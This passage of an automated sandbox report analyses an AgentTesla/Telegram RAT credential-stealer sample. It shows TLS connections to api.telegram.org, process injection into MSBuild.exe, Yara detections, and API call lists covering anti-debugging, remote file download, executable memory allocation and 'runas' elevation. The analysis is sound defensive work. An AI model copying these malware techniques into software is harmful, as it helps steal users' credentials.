Aug 31, 2021 19:41:22.007800102 CEST	149.154.167.220	443	192.168.2.5	49724	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
Aug 31, 2021 19:41:24.302069902 CEST	149.154.167.220	443	192.168.2.5	49725	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
Aug 31, 2021 19:41:24.418850899 CEST	149.154.167.220	443	192.168.2.5	49726	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
Aug 31, 2021 19:41:42.279213905 CEST	149.154.167.220	443	192.168.2.5	49727	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe PID: 4588 Parent PID: 5132

General

Start time:	19:39:36
Start date:	31/08/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe'
Imagebase:	0x400000
File size:	421376 bytes
MD5 hash:	074864AED555C328431042197F317B23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 2512 Parent PID: 4588

General

Start time:	19:39:38
Start date:	31/08/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe'
Imagebase:	0x850000
File size:	261728 bytes
MD5 hash:	D621FD77BD585874F9686D3A76462EF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe PID: 4588 Parent PID: 5132 SecuriteInfo.com.W32.AIDetect.malware2.17994.exeCOMMON

Executed Functions

Function 0040374E, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0040376D

Part of subcall function 00404257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe,00000104,?,00000000,00000001,00000000), ref: 0040428C

IsDebuggerPresent.KERNEL32(?,?), ref: 0040377F
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe,00000104,?,004C1120,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe,004C1124,?,?), ref: 004037EE

Part of subcall function 004034F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0040352A

SetCurrentDirectoryW.KERNEL32(?), ref: 00403860
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004B2934,00000010), ref: 004721C5
SetCurrentDirectoryW.KERNEL32(?,?), ref: 004721FD
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00472232
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0049DAA4), ref: 00472290
ShellExecuteW.SHELL32(00000000), ref: 00472297

Part of subcall function 004030A5: GetSysColorBrush.USER32(0000000F), ref: 004030B0
Part of subcall function 004030A5: LoadCursorW.USER32(00000000,00007F00), ref: 004030BF
Part of subcall function 004030A5: LoadIconW.USER32(00000063), ref: 004030D5
Part of subcall function 004030A5: LoadIconW.USER32(000000A4), ref: 004030E7
Part of subcall function 004030A5: LoadIconW.USER32(000000A2), ref: 004030F9
Part of subcall function 004030A5: RegisterClassExW.USER32(?), ref: 00403167

Part of subcall function 00402E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00402ECB
Part of subcall function 00402E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00402EEC
Part of subcall function 00402E9D: ShowWindow.USER32(00000000), ref: 00402F00
Part of subcall function 00402E9D: ShowWindow.USER32(00000000), ref: 00402F09

Part of subcall function 00403598: _memset.LIBCMT ref: 004035BE
Part of subcall function 00403598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00403667

Strings

This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 004721BE
runas, xrefs: 0047228B
"L, xrefs: 0040379D
C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, xrefs: 004037B4, 004037E9, 004037FD, 00472257

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"L
API String ID: 4253510256-1021359289
Opcode ID: b395969925f2eb3e1758d4b2ff984058784986991750a9bc83ba92a924d946b8
Instruction ID: e3e32de4d44c0b479ee3af722061bc9db16f02a9ec6889f43e2aa96a4e30ea06
Opcode Fuzzy Hash: b395969925f2eb3e1758d4b2ff984058784986991750a9bc83ba92a924d946b8
Instruction Fuzzy Hash: 37513B75644144BACB00BFA19C46FAE3F6C9B0A705F0440BFF645B21E2CABC4A45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004029C2, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00402A33
KillTimer.USER32(?,00000001), ref: 00402A5D
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00402A80
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00402A8B
CreatePopupMenu.USER32 ref: 00402A9F
PostQuitMessage.USER32(00000000), ref: 00402AAE

Strings

TaskbarCreated, xrefs: 00402A86

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 3a1ae73eaa6de7c3c1ac996b56d9357d0f2b27738778e3f7166bd1ef804fe5c3
Instruction ID: 1ac37e42a2c497799080cc496a1eed988c870a284665e23698f56c52c5ada700
Opcode Fuzzy Hash: 3a1ae73eaa6de7c3c1ac996b56d9357d0f2b27738778e3f7166bd1ef804fe5c3
Instruction Fuzzy Hash: C741E331714245ABDB246F699E0DFBA3759EB15304F00453BF906B22E2DEFC98418B6E

Uniqueness

Uniqueness Score: -1.00%

Function 01C70095, Relevance: 13.8, APIs: 9, Instructions: 299filememorylibraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,BF68ECEF), ref: 01C70256
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 01C70295
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01C702B6
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01C702DD
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 01C702F6
VirtualAlloc.KERNEL32(00000000,000016EE,00003000,00000040), ref: 01C7030E
VirtualAlloc.KERNEL32(00000000,-FFFFE912,00003000,00000004), ref: 01C70322
und_memcpy.LIBVCRUNTIME ref: 01C70331
und_memcpy.LIBVCRUNTIME ref: 01C70345

Memory Dump Source

Source File: 00000001.00000002.261519171.0000000001C70000.00000040.00000001.sdmp, Offset: 01C70000, based on PE: false

Similarity

API ID: AllocFileVirtual$und_memcpy$CreateDownloadLibraryLoadRead
String ID:
API String ID: 3217363355-0
Opcode ID: c41b5600c06030aeb97277aea82024f7675f5e21e37e2cbb59ede7624913f3a5
Instruction ID: 487a6d101f1abe65c50618a016031b1ecbf0f965c246f82cf38e7227d3662d08
Opcode Fuzzy Hash: c41b5600c06030aeb97277aea82024f7675f5e21e37e2cbb59ede7624913f3a5
Instruction Fuzzy Hash: BB91E326E54318AAEB10DBF0DC55FEFB7B8EF15750F10202AF604EB291E6B54A41C729

Uniqueness

Uniqueness Score: -1.00%

Function 051606DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 051607B4
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 051607DE
ReadFile.KERNEL32(00000000,00000000,0516026C,?,00000000), ref: 051607F5
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05160817
FindCloseChangeNotification.KERNEL32(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,051601AE,7FDFFF66), ref: 0516088A
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 05160895
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,051601AE), ref: 051608E0

Memory Dump Source

Source File: 00000001.00000002.261826032.0000000005160000.00000040.00000001.sdmp, Offset: 05160000, based on PE: false

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction ID: 39e9e7533beda59125c0a9c181c1b8b1fbf43aa209fc745a664b846cf577c6a9
Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction Fuzzy Hash: 9461A335F01708ABCB10DFA4C888BAEB7BABF4C710F154459E505EB391E7749D518B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041E47B, Relevance: 10.7, APIs: 7, Instructions: 175COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0041E4A7

Part of subcall function 00407E53: _memmove.LIBCMT ref: 00407EB9

GetCurrentProcess.KERNEL32(00000000,0049DC28,?,?), ref: 0041E567
GetNativeSystemInfo.KERNEL32(?,0049DC28,?,?), ref: 0041E5BC
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041E5C7
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041E5DA
GetSystemInfo.KERNEL32(?,0049DC28,?,?), ref: 0041E5E4
GetSystemInfo.KERNEL32(?,0049DC28,?,?), ref: 0041E5F0

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
String ID:
API String ID: 2717633055-0
Opcode ID: 1275ec4b80402d0b63739f9aa5e1eab301fcf2eb3511f78edd4829ae81ee4a68
Instruction ID: 7dabe0296a0c877075fe877cecda08ec28212825014accb3c0e357cf3838ac85
Opcode Fuzzy Hash: 1275ec4b80402d0b63739f9aa5e1eab301fcf2eb3511f78edd4829ae81ee4a68
Instruction Fuzzy Hash: 6661E5B5809290DFCF15CFA994C01EA7FB56F2A304F1849DADC485B347D638C949CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004031F2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00403219
LoadResource.KERNEL32(?,00000000), ref: 004757D7
SizeofResource.KERNEL32(?,00000000), ref: 004757EC
LockResource.KERNEL32(?), ref: 004757FF

Strings

SCRIPT, xrefs: 0040320F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SCRIPT
API String ID: 3473537107-3967369404
Opcode ID: 248d1b814bb5f0234f256de43164844f75923d0b1a18415589ce9719e986a921
Instruction ID: 803b3843afe11912b577b5d5f482d3b62661864ef8fcff09b86788d87dcfe5d4
Opcode Fuzzy Hash: 248d1b814bb5f0234f256de43164844f75923d0b1a18415589ce9719e986a921
Instruction Fuzzy Hash: C3115A70600701BFE7219F65EC48F277BBDEBC9B52F2088AEB41296290DB71D9008A64

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1F0, Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E279
timeGetTime.WINMM ref: 0040E51A
TranslateMessage.USER32(?), ref: 0040E646
DispatchMessageW.USER32(?), ref: 0040E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E664
LockWindowUpdate.USER32(00000000), ref: 0040E697
DestroyWindow.USER32 ref: 0040E6A3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040E6BD
Sleep.KERNEL32(0000000A), ref: 00475B15
TranslateMessage.USER32(?), ref: 004762AF
DispatchMessageW.USER32(?), ref: 004762BD
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004762D1

Strings

@GUI_CTRLHANDLE, xrefs: 00475C51
@GUI_WINHANDLE, xrefs: 00475C05
@GUI_CTRLID, xrefs: 00475BB9
@TRAY_ID, xrefs: 00475D6E

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 2c44e9f5c44f14602653de6155d1f4072555b0ed3b66d4948ee9000f0ce2f879
Instruction ID: 9f75f28ad873f7a693ce7cabed4a476f1661ce44e3fe24c8e0a20ced231df24b
Opcode Fuzzy Hash: 2c44e9f5c44f14602653de6155d1f4072555b0ed3b66d4948ee9000f0ce2f879
Instruction Fuzzy Hash: 6762C1705083409FDB20DF65C885BAA77E5AF44308F044D7FE94A9B2E2DBB9D844CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00436A28, Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMON

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00436C73
___createFile.LIBCMT ref: 00436CB4
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00436CDD
__dosmaperr.LIBCMT ref: 00436CE4
GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00436CF7
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00436D1A
__dosmaperr.LIBCMT ref: 00436D23
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00436D2C
__set_osfhnd.LIBCMT ref: 00436D5C
__lseeki64_nolock.LIBCMT ref: 00436DC6
__close_nolock.LIBCMT ref: 00436DEC
__chsize_nolock.LIBCMT ref: 00436E1C
__lseeki64_nolock.LIBCMT ref: 00436E2E
__lseeki64_nolock.LIBCMT ref: 00436F26
__lseeki64_nolock.LIBCMT ref: 00436F3B
__close_nolock.LIBCMT ref: 00436F9B

Part of subcall function 0042F84C: FindCloseChangeNotification.KERNEL32(00000000,004AEEC4,00000000,?,00436DF1,004AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042F89C
Part of subcall function 0042F84C: GetLastError.KERNEL32(?,00436DF1,004AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042F8A6
Part of subcall function 0042F84C: __free_osfhnd.LIBCMT ref: 0042F8B3
Part of subcall function 0042F84C: __dosmaperr.LIBCMT ref: 0042F8D5

Part of subcall function 0042889E: __getptd_noexit.LIBCMT ref: 0042889E

__lseeki64_nolock.LIBCMT ref: 00436FBD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004370F2
___createFile.LIBCMT ref: 00437111
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0043711E
__dosmaperr.LIBCMT ref: 00437125
__free_osfhnd.LIBCMT ref: 00437145
__invoke_watson.LIBCMT ref: 00437173
__wsopen_helper.LIBCMT ref: 0043718D

Strings

9AB, xrefs: 0043705E
@, xrefs: 00436D48

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
